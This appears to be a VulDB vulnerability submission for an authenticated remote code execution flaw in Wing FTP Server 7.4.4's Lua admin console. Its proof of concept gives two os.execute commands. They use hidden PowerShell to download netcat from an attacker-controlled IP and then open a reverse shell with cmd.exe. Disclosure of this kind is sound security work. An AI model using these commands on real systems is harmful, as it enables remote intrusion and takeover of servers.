| Field | Value |
|---|---|
| Title | wftpserver Wing FTP Server 7.4.4 Remote Code Execution via Lua Admin Console |
| Description | Affected Version: Wing FTP Server 7.4.4 (Windows)<br>Authentication Required: Yes<br>Wing FTP Server provides an administrative Lua scripting console accessible via its web interface. Authenticated administrators are able to execute arbitrary Lua code with insufficient sandboxing.<br><br>POC:<br>To execute the exploit, I logged into the application with an admin account via remote web access. The Wing FTP Server was running on my Windows machine and I accessed the console via a browser on my Linux machine (the software has a remote access feature).<br>In the Lua admin console, type the following commands:<br>`os.execute('powershell -NoP -NonI -W Hidden -Exec Bypass -Command "(New-Object Net.WebClient).DownloadFile(\'http://192.168.234.131:8000/nc.exe\', \'C:\\\\Users\\\\usuario\\\\Desktop\\\\Drops\\\\nc.exe\')"')`<br>`os.execute('cmd /c powershell -NoP -W Hidden -Command "Start-Process \\"C:\\Users\\usuario\\Desktop\\Drops\\nc.exe\\" -ArgumentList \\"192.168.234.131\\",\\"4443\\",\\"-e\\",\\"cmd.exe\\""')`<br><br>The first piece of the command will download nc.exe (netcat for Windows x86) to the path "C:\Users\usuario\Desktop\Drops". The second part will execute `nc.exe 192.168.234.131 4443 -e cmd.exe`. Now you get a reverse shell!<br>It is possible to see at this link (https://www.wftpserver.com/serverhistory.htm) that the vendor mentions that the RCE in version 7.4.4 was fixed. |
| Source | https://github.com/Nouvexr/Wing-FTP-Server-7.4.4-RCE-Authenticated/blob/main/poc.txt |
| User | nouvexr (UID 33215) |
| Submission | 2025-05-24 16:44 (1 year ago) |
| Moderation | 2025-05-26 10:20 (2 days later) |
| Status | Accepted |
| VulDB Entry | 310279 [Wing FTP Server up to 7.4.3 Lua Admin Console privilege escalation] |
| Points | 20 |